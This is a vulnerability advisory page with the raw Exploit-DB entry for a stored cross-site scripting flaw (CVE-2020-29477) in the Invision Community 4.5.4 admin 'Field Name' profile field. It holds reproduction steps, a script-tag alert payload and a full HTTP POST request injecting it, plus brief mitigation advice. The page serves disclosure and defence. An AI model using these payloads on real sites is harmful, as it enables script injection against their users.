Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting

vendor:

Invision Community

by:

Hemant Patidar (HemantSolo)

4.8

CVSS

MEDIUM

Stored Cross-Site Scripting

CWE

Product Name: Invision Community

Affected Version From: 4.5.2004

Affected Version To: 4.5.2004

Patch Exists: YES

Related CWE: CVE-2020-29477

CPE: a:invision_community:invision_community:4.5.4

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Kali Linux

2020

Invision Community 4.5.4 – ‘Field Name’ Stored Cross-Site Scripting

The vulnerability exists in the 'Field Name' parameter of the Invision Community admin page. By injecting a malicious payload into the 'Field Name' parameter, an attacker can trigger a cross-site scripting (XSS) attack.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user input before displaying it on webpages. In addition, implementing a web application firewall (WAF) can help detect and block XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
# Date: 02-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://invisioncommunity.com/
# Software Link: https://invisioncommunity.com/buy
# Version: 4.5.4
# Tested on: Windows 10/Kali Linux
# CVE:  CVE-2020-29477

Vulnerable Parameters: Profile - Field Name.

Steps-To-Reproduce:
1. Go to the Invision Community admin page.
2. Now go to the Members - MEMBER SETTINGS - Profiles.
3. Now click on Add Profile field.
4. Put the below payload in Field Name:
"<script>alert(123)</script>"
5. Now click on Save button.
6. The XSS will be triggered.


POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 660
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: XYZ

form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=